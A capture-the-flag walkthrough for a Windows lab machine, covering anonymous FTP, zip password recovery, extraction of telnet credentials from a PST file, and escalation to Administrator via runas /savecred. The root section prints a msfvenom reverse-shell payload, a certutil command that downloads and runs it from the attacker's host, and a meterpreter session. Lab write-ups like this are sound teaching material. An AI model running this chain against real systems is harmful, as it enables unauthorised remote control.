## TL;DR
Anonymous login to an FTP server allowed access to backup files. From the backups, a password for a protected zip could be found. The archive contained emails which contained credentials to connect to telnet, giving a user-level shell. `runas` could then be used to execute a reverse shell as the Administrator because the account had saved credentials.
## User
As ever, let's throw `nmap` at it and see what it reveals.
```
# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.074s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds
```
This scan reveals 3 open ports:
- 21/tcp - An FTP server. The default scripts have determined that anonymous login is allowed, which means there are likely to be files we can access.
- 23/tcp - Telnet. Telnet wants a username and password for authentication that we don't have yet.
- 80/tcp - HTTP. At a glance there is nothing useful here.
## FTP Server
Nmap determined that the FTP server allows anonymous logins. This means that after connecting to the server with `ftp 10.10.10.98` we can log in with the default username `anonymous` and a blank password.
```
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
```
We are greeted by two directories: the first, `Backups`, contains a file named `backup.mdb`, and the second, `Engineer`, contains a file named `Access Control.zip`. We can download them with `get` (note that the name containing a space has to be quoted).
```
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 3.23 secs (1.6692 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.13 secs (80.7015 kB/s)
```
We now have two files from the FTP server. The first appears to be a Microsoft Access database and the second a password-protected zip.
## backup.mdb
Running `strings` on `backup.mdb` prints the ASCII text contained in the file. Running simply `strings backup.mdb` produces too much noise, so the `-n` option (minimum string length) is used to cut it down. `strings -n 10 backup.mdb` is a sufficient filter, and some potential passwords can be seen, likely for the zip file.
```
JMOLqQikYdb
MWQM\YbMd^di
MWQM\domMd^di
OLqQikYdbJMMQkk
`YbkbdLiQJ\Yb
`YbkbdLiQJ\dom
`Ybkbd^QJqQ
`YbkbdmdqQimY`Q
`Ybksdi\OJv
bdLiQJ\dom
domdqQimY`Q
administrator;
Administrator<
4555555555555Q
ppermission
backup_admin
[email protected] <--- Looks Suspicious to me
```
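To make the effect of `-n` concrete, here is an added example (not code from the original writeup) that reimplements the core of `strings -n N` in Python: it collects runs of printable ASCII bytes and keeps only those at least N bytes long. The input is a small constructed byte blob standing in for `backup.mdb`, with binary filler around a few embedded fields; the function `count_by_min_len` shows how the number of surviving strings falls as the minimum length rises, which is why `-n 10` was enough to make the interesting fields stand out.

```python
import sys

# Bytes GNU `strings` treats as printable by default: 0x20..0x7E plus tab.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of at least `min_len` printable ASCII bytes, like `strings -n min_len`."""
    found = []
    run = bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        # A non-printable byte ends the current run; keep it only if long enough.
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run.clear()
    if len(run) >= min_len:  # run that reaches end of file
        found.append(run.decode("ascii"))
    return found


def count_by_min_len(data: bytes, lengths) -> dict:
    """How many strings survive for each candidate -n value (shows the noise reduction)."""
    return {n: len(extract_strings(data, n)) for n in lengths}


# Constructed sample (not the real backup.mdb): binary filler with a few ASCII fields embedded.
SAMPLE = (
    b"\x00\x01\x02" + b"Jet" + b"\x03\x04"
    + b"\xff" * 8
    + b"admin" + b"\x00\x00"
    + b"backup_admin" + b"\x00"
    + b"\x7f\x80\x81"
    + b"engineer" + b"\x00\x00"
    + b"SuperSecretPassword123" + b"\x00"
    + b"\x05" + b"abc" + b"\x06"
)


if __name__ == "__main__":
    # Usage: python strings_n.py [file] [min_len]; without a file, the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    min_len = int(sys.argv[2]) if len(sys.argv) > 2 else 10
    print("strings per -n value:", count_by_min_len(data, [3, 4, 10]))
    for s in extract_strings(data, min_len):
        print(s)
```

Short printable runs occur by chance inside binary structures, which is where most of the noise in the unfiltered output comes from; raising `-n` removes them without touching longer fields such as usernames and passwords.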
## Access Control.zip
`[email protected]` is in fact the password for the zip. However, you'll find that it can't be extracted using `unzip`, which reports `unsupported compression method 99`. If you look up compression method 99 you'll find that it denotes WinZip AES encryption, which isn't currently supported by the `unzip` binary. Luckily, the system archive manager (in GNOME at least) can be used as an alternative.
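To see exactly what `unzip` is complaining about, here is an added example (not part of the original writeup) that walks a zip's local file headers and reports each entry's compression method, decoding the WinZip AES extra field (header ID 0x9901) that accompanies method 99. Both archives it inspects are constructed inside the script: an ordinary deflated archive built with Python's `zipfile`, and a hand-built local header imitating an AES-256 entry named after the file in this writeup, whose payload is filler rather than real ciphertext. The same check is useful on the defensive side, since archives a gateway scanner cannot open deserve closer attention.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
LOCAL_FMT = "<4sHHHHHIIIHH"  # sig, ver, flags, method, time, date, crc, csize, usize, name_len, extra_len
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes
METHOD_NAMES = {0: "stored", 8: "deflated", 99: "WinZip AES"}
AES_KEY_BITS = {1: 128, 2: 192, 3: 256}


def parse_aes_extra(extra: bytes):
    """Decode the 0x9901 extra field: AE version, vendor 'AE', key strength, real method."""
    pos = 0
    while pos + 4 <= len(extra):
        hid, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4 : pos + 4 + size]
        if hid == 0x9901 and len(body) >= 7:
            ae_version, vendor, strength, real_method = struct.unpack_from("<H2sBH", body, 0)
            return {
                "ae_version": ae_version,
                "vendor": vendor.decode("ascii", "replace"),
                "key_bits": AES_KEY_BITS.get(strength),
                "real_method": real_method,
            }
        pos += 4 + size
    return None


def list_entries(data: bytes) -> list:
    """Walk local file headers and describe each entry's method and encryption."""
    entries = []
    pos = 0
    while data[pos : pos + 4] == LOCAL_SIG:
        (_, _, flags, method, _, _, _, csize, _, name_len, extra_len) = struct.unpack_from(LOCAL_FMT, data, pos)
        if flags & 0x0008:
            # Data-descriptor flag: sizes live after the data, so the central directory
            # must be used instead of walking local headers. Out of scope for this example.
            raise ValueError("streamed archive: sizes not in local header")
        name_start = pos + LOCAL_LEN
        name = data[name_start : name_start + name_len].decode("utf-8", "replace")
        extra = data[name_start + name_len : name_start + name_len + extra_len]
        entries.append({
            "name": name,
            "method": method,
            "method_name": METHOD_NAMES.get(method, f"method {method}"),
            "encrypted": bool(flags & 0x0001),
            "aes": parse_aes_extra(extra) if method == 99 else None,
        })
        pos = name_start + name_len + extra_len + csize
    return entries


def unsupported_by_unzip(entries) -> list:
    """Names of entries classic `unzip` refuses: those using method 99."""
    return [e["name"] for e in entries if e["method"] == 99]


def _aes_local_header(name: bytes, payload: bytes, strength: int, real_method: int) -> bytes:
    # Constructed AE-2 header: method 99, encryption flag set, CRC zeroed as the AE-2 spec requires.
    extra = struct.pack("<HHH2sBH", 0x9901, 7, 2, b"AE", strength, real_method)
    header = struct.pack(LOCAL_FMT, LOCAL_SIG, 51, 0x0001, 99, 0, 0, 0,
                         len(payload), len(payload), len(name), len(extra))
    return header + name + extra + payload


def build_samples():
    """Return (plain_zip, aes_zip); both are constructed here, not taken from the box."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", "constructed sample content, nothing sensitive here " * 4)
    plain = buf.getvalue()
    # Payload is filler: a real entry carries salt, password verifier, ciphertext and auth code.
    aes = _aes_local_header(b"Access Control.pst", b"\x00" * 40, strength=3, real_method=8)
    return plain, aes


if __name__ == "__main__":
    for label, blob in zip(("plain", "aes"), build_samples()):
        ents = list_entries(blob)
        print(label, ents, "unzip cannot extract:", unsupported_by_unzip(ents))
```

Method 99 is not a compression algorithm at all: the real method is tucked into the extra field, and the entry data is AES ciphertext wrapped in a salt, a password verifier and an authentication code, which is why a tool that only knows the classic method table stops at the header.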
Within the zip is a `.pst` file; using `file` to determine its type yields:
```
Access Control.pst: Microsoft Outlook email folder (>=2003)
```
When I first did this box, I'll be honest, I just found an online converter to view the file, and while it's not the best practice, in the heat of the moment while the blood was still very much up for grabs, it worked.
However, the proper way of doing this is with the `readpst` command.
```
readpst -o ./ Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.
```
The email can then clearly be seen in the `2.eml` file it creates.
```
Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.

Regards,
John
```
Either way, once the email is extracted we obtain the username `security` and the password `4Cc3ssC0ntr0ller`. These will likely be for telnet.
## Telnet
After running `telnet 10.10.10.98`, it is confirmed that this is the case, as these credentials are accepted. Once connected, you can navigate to the `user.txt` flag and print it with `type user.txt`.
```
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop

C:\Users\security\Desktop>type user.txt
```
## Root
Start `msfconsole` and load the exploit listener with `use exploit/multi/handler`. Next, set the payload to `windows/meterpreter/reverse_tcp`, populate the options as required for your environment, and start the listener with `run`.
```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.13.37.10
lhost => 10.13.37.10
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.37.10      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.37.10:4444
```
Next we need to generate a payload; to do this we will use `msfvenom`:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
```
Now we need to host this file so that it can be fetched from the target; to do this we will use Python's `SimpleHTTPServer`:
```
python -m SimpleHTTPServer 80
```
Then, to download the shell, we can make use of `certutil` (this may not work on all versions of Windows). As we are using `certutil`, we have to host the web server on port 80 instead of the default 8000.
```
certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe
```
Finally, we run `runas /savecred /user:ACCESS\Administrator shell.exe` to execute the shell as the Administrator. This works because the `security` account has saved credentials for the Administrator user, so `runas` never prompts for a password.
```
C:\Users\security\Desktop>cd C:\temp

C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe

C:\temp>
```
If you look at `msfconsole` you should now have a privileged shell waiting for you that can be used to read `root.txt`.
```
[*] Started reverse TCP handler on 10.10.13.37:4444
[*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200)

meterpreter > shell
Process 3428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
```